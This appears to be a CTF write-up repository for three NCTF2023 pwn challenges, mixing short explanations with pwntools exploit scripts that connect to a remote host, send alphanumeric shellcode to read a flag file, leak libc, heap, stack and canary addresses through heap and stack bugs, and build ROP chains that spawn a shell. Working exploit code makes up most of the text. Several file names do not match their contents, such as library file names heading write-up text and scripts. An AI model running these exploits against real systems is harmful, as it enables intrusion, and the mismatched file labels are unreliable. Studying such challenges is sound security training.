NCTF2023

Author: Ex-Origin

2023nctf/pwn/checkin/README.md

@@ -0,0 +1,60 @@
+
+## checkin
+
+```
+Arch:     amd64-64-little
+RELRO:    Partial RELRO
+Stack:    No canary found
+NX:       NX enabled
+PIE:      PIE enabled
+```
+
+Basic amd64 alphanumeric shellcode challenge
+
+```c
+int __fastcall main()
+{
+  __int64 v0; // rbx
+  __int64 v1; // rbx
+  __int64 v2; // rbx
+  unsigned __int64 v4; // [rsp+8h] [rbp-28h]
+  char *addr; // [rsp+10h] [rbp-20h]
+  int i; // [rsp+1Ch] [rbp-14h]
+
+  addr = (char *)mmap((void *)0x20230000, 0x1000uLL, 7, 34, -1, 0LL);
+  if ( addr == (char *)-1LL )
+  {
+    perror("mmap");
+    exit(EXIT_FAILURE);
+  }
+  write(STDOUT_FILENO, "Give me your shellcode: ", 24uLL);
+  v4 = read(STDIN_FILENO, addr + 0x30, 0x100uLL);
+  for ( i = 0; i < v4; ++i )
+  {
+    if ( (addr[i + 48] <= '`' || addr[i + 48] > 'z')
+      && (addr[i + 48] <= '@' || addr[i + 48] > 'Z')
+      && (addr[i + 48] <= '/' || addr[i + 48] > '9')
+      && addr[i + 48] != '/' )
+    {
+      printf("Invalid character: %c\n", (unsigned int)addr[i]);
+      exit(1);
+    }
+  }
+  v0 = qword_4088;
+  *(_QWORD *)addr = payload;
+  *((_QWORD *)addr + 1) = v0;
+  v1 = qword_4098;
+  *((_QWORD *)addr + 2) = qword_4090;
+  *((_QWORD *)addr + 3) = v1;
+  v2 = qword_40A8;
+  *((_QWORD *)addr + 4) = qword_40A0;
+  *((_QWORD *)addr + 5) = v2;
+  sandbox();
+  ((void (*)(void))addr)();
+  return 0;
+}
+```
+
+Exploitation:
+
+Utilize the offset of the entry address on the stack, and set RAX to the entry address. Subsequently, generate the shellcode directly using Alpha3.

2023nctf/pwn/checkin/checkin-release

@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='debug')
+
+sh = remote('8.130.35.16', 58002)
+
+sh.sendafter(b'shellcode: ', b'jBZPPPf1Tt0XXXXXXX' + b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G122o5L162v1n3Z4s3f173p4I3c1o3c353d1L062G4N06060q05184r4L000n020b0z5L3m2I004r113Y1N8N3R1O3r3Y3b17401N051M8N3n1M4M3k114u8O0E5o0q8M3F0b')
+sh.recvuntil(b'0')
+
+shellcode = asm(
+'''
+jmp start
+
+read:
+    mov r15, rdx
+    xor edx, edx
+    inc edx
+read_again:
+    xor eax, eax
+    syscall
+    inc rsi
+    dec r15
+    test r15, r15
+    jnz read_again
+ret
+
+write:
+    mov r15, rdx
+    xor edx, edx
+    inc edx
+write_again:
+    xor eax, eax
+    inc eax
+    syscall
+    inc rsi
+    dec r15
+    test r15, r15
+    jnz write_again
+ret
+
+start:
+    xor edi, edi
+    mov eax, 3
+    syscall
+
+    mov eax, 0x67616c66 ;// flag
+    push rax
+
+    mov rdi, rsp
+    xor eax, eax
+    mov esi, eax
+    mov al, 2
+    syscall ;// open
+
+    push rax
+    mov rsi, rsp
+    xor eax, eax
+    mov edx, eax
+    inc eax
+    mov edi, eax
+    mov dl, 8
+    call write
+
+    pop rax
+    test rax, rax
+    js over
+
+    mov edi, eax
+    mov rsi, rsp
+    mov edx, 0x01010201
+    sub edx, 0x01010101
+    xor eax, eax
+    call read
+
+    mov edx, eax
+    mov rsi, rsp
+    xor eax, eax
+    inc eax
+    mov edi, eax
+    call write
+
+over:
+    xor edi, edi
+    mov eax, 0x010101e8
+    sub eax, 0x01010101
+    syscall ;// exit
+
+''')
+
+sh.send(shellcode.ljust(0x400, b'\xcc'))
+
+sh.interactive()
+

2023nctf/pwn/checkin/exp.py

@@ -0,0 +1,18 @@
+
+## nception
+
+In the context of a stack overflow vulnerability in the "edit" function, allowing control over exception handling, it becomes possible to manipulate the value of RBP. Moreover, within the catch block, the address 0000000000402E2C performs a write operation on the memory pointed to by RBP. Hence, leveraging this characteristic, one can modify the lower bits of the "ptrs" pointer to position it under control. This manipulation facilitates arbitrary address read and write operations.
+
+```
+.text:0000000000402E16 ;   catch(std::exception) // owned by 402DC0
+.text:0000000000402E16                 cmp     rdx, 1
+.text:0000000000402E1A                 jz      short loc_402E24
+.text:0000000000402E1C                 mov     rdi, rax        ; struct _Unwind_Exception *
+.text:0000000000402E1F                 call    __Unwind_Resume
+.text:0000000000402E24 ; ---------------------------------------------------------------------------
+.text:0000000000402E24
+.text:0000000000402E24 loc_402E24:                             ; CODE XREF: main+11D↑j
+.text:0000000000402E24                 mov     rdi, rax        ; void *
+.text:0000000000402E27                 call    ___cxa_begin_catch
+.text:0000000000402E2C                 mov     [rbp+e], rax
+```

2023nctf/pwn/checkin/libc-2.38/ld-linux-x86-64.so.2

@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+def add():
+    sh.sendlineafter(b'your choice: ', b'1')
+
+def edit(index, offset, content):
+    sh.sendlineafter(b'your choice: ', b'2')
+    sh.sendlineafter(b'idx: ', str(index).encode())
+    sh.sendlineafter(b'offset: ', str(offset).encode())
+    sh.sendlineafter(b'data: ', content)
+
+def show(index):
+    sh.sendlineafter(b'your choice: ', b'3')
+    sh.sendlineafter(b'read?\n', str(index).encode())
+
+def delete(index):
+    sh.sendlineafter(b'your choice: ', b'4')
+    sh.sendlineafter(b'destroy?\n', str(index).encode())
+
+sh = remote('8.130.35.16', 58000)
+
+add()
+add()
+add()
+add()
+add()
+add()
+add()
+delete(1)
+delete(2)
+delete(3)
+delete(4)
+delete(5)
+delete(6)
+add()
+add()
+add()
+add()
+add()
+add()
+
+edit(0, 0x130, p64(0x405FC8))
+edit(0, 0x130+8, p32(0x444))
+
+edit(0, 0, cyclic(544) + p64(0x406429+0x18)[:6])
+show(6)
+sh.recvuntil(b'Data: ')
+libc_addr = u64(sh.recvn(6) + b'\0\0') - 0xf87d0
+success('libc_addr: ' + hex(libc_addr))
+
+edit(0, 0x130, p64(libc_addr + 0x1da321))
+edit(0, 0x130+8, p32(0x444))
+show(6)
+sh.recvuntil(b'Data: ')
+stack_addr = u64(sh.recvn(5) + b'\0\0\0') * 0x100
+
+find_stack = False
+for i in range(0x18):
+    edit(0, 0x130, p64(stack_addr + 0x11 + i * 8))
+    edit(0, 0x130+8, p32(0x444))
+    show(6)
+    sh.recvuntil(b'Data: ')
+    result = u64(sh.recvn(5) + b'\0\0\0') * 0x100
+    info('result: ' + hex(result))
+    if(result == libc_addr + 0x27200):
+        stack_addr += 0x10 + i * 8
+        success('stack_addr: ' + hex(stack_addr))
+        find_stack = True
+        break
+if find_stack == False:
+    raise EOFError("Invailed stack")
+
+edit(0, 0x130, p64(stack_addr - 0x10 + 1))
+edit(0, 0x130+8, p32(0x444))
+show(6)
+sh.recvuntil(b'Data: ')
+canary = u64(b'\0' + sh.recvn(7))
+success('canary: ' + hex(canary))
+
+edit(0, 0, b'\0' * 0x10 + cyclic(504) + p64(canary) + flat(
+[
+    0,
+    1,
+    2,
+    libc_addr + 0x0000000000027765,
+    libc_addr + 0x196031,
+    libc_addr + 0x0000000000028f19,
+    0,
+    libc_addr + 0x00000000000fdcfd,
+    0,
+    libc_addr + 0x000000000003f117,
+    59,
+    libc_addr + 0x0000000000086002,
+]
+))
+
+sh.interactive()

2023nctf/pwn/checkin/libc-2.38/libc.so.6

@@ -0,0 +1,4 @@
+
+## npointment
+
+The vulnerability is located in function 14B3. Inputting "date=date=date" triggers a heap overflow, and subsequently, tcache-hijack is employed to achieve the exploitation objective.

2023nctf/pwn/nception/README.md

@@ -0,0 +1,115 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+sh = remote('8.130.35.16', 58001)
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0x500  + b'\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+
+sh.sendlineafter(b'$ ', b'delete index=0\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaaaaaaa\0' + cyclic(21) + p64(0x531) + b'\0' * 0x800)
+sh.sendlineafter(b'$ ', b'delete index=2\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0x600  + b'\0')
+
+sh.sendlineafter(b'$ ', b'show index=3\0')
+sh.recvuntil(b'Appointment #3:')
+sh.recvuntil(b'Content: ')
+libc_addr = u64(sh.recvn(6) + b'\0\0') - 0x1ff130
+success('libc_addr: ' + hex(libc_addr))
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'delete index=6\0')
+
+sh.sendlineafter(b'$ ', b'show index=3\0')
+sh.recvuntil(b'Appointment #3:')
+sh.recvuntil(b'Content: ')
+heap_addr = u64(sh.recvn(5) + b'\0\0\0') * 0x1000
+success('heap_addr: ' + hex(heap_addr))
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+
+sh.sendlineafter(b'$ ', b'delete index=0\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaaaaaaa\0' + cyclic(21) + p64(0x31) + b'\0' * 0x800)
+sh.sendlineafter(b'$ ', b'delete index=2\0')
+
+sh.sendlineafter(b'$ ', b'delete index=7\0')
+sh.sendlineafter(b'$ ', b'delete index=6\0')
+
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0x20 + p64((heap_addr >> 12) ^ (libc_addr + 0x247320))) # libc-2.38/ld-linux-x86-64.so.2
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaa\0' + b':' * 0x800)
+
+sh.sendlineafter(b'$ ', b'show index=7\0')
+sh.recvuntil(b'Appointment #7:')
+sh.recvuntil(b':'*10)
+image_base = u64(sh.recvn(6) + b'\0\0') - 0x3e78
+success('image_base: ' + hex(image_base))
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'delete index=9\0')
+sh.sendlineafter(b'$ ', b'delete index=8\0')
+
+sh.sendlineafter(b'$ ', b'delete index=0\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaaaaaaa\0' + cyclic(21) + p64(0x71) + b'\0' * 0x800)
+sh.sendlineafter(b'$ ', b'delete index=2\0')
+
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0x60 + p64((heap_addr >> 12) ^ (image_base + 0x50e0)))
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 8 + p64(libc_addr + 0x206258))
+
+sh.sendlineafter(b'$ ', b'show index=6\0')
+sh.recvuntil(b'Appointment #6:')
+sh.recvuntil(b'Content: ')
+stack_addr = u64(sh.recvn(6) + b'\0\0')
+success('stack_addr: ' + hex(stack_addr))
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'delete index=11\0')
+sh.sendlineafter(b'$ ', b'delete index=10\0')
+
+sh.sendlineafter(b'$ ', b'delete index=0\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaaaaaaa\0' + cyclic(21) + p64(0xb1) + b'\0' * 0x800)
+sh.sendlineafter(b'$ ', b'delete index=2\0')
+
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0xa0 + p64((heap_addr >> 12) ^ (stack_addr - 0x138)))
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=' + p64(image_base + 0x4180))
+
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'add content=a\0')
+sh.sendlineafter(b'$ ', b'delete index=13\0')
+sh.sendlineafter(b'$ ', b'delete index=12\0')
+
+sh.sendlineafter(b'$ ', b'delete index=0\0')
+sh.sendlineafter(b'$ ', b'add content=date=date=aaaaaaaaa\0' + cyclic(21) + p64(0xf1) + b'\0' * 0x800)
+sh.sendlineafter(b'$ ', b'delete index=2\0')
+
+sh.sendlineafter(b'$ ', b'add content=' + b'a' * 0xe0 + p64((heap_addr >> 12) ^ (stack_addr - 0x148)))
+sh.sendlineafter(b'$ ', b'add content=a\0')
+
+sh.sendlineafter(b'$ ', (b'add content=' + b'a' * 8 + p64(libc_addr + 0x0000000000026a3d)).ljust(0x100, b'\0') + flat(
+[
+    libc_addr + 0x0000000000028715, 
+    libc_addr + 0x1c041b,
+    libc_addr + 0x000000000002a671,
+    0,
+    libc_addr + 0x0000000000093359,
+    0, 0,
+    libc_addr + 0x0000000000046663,
+    59,
+    libc_addr + 0x00000000000942b6,
+]
+))
+
+sh.interactive()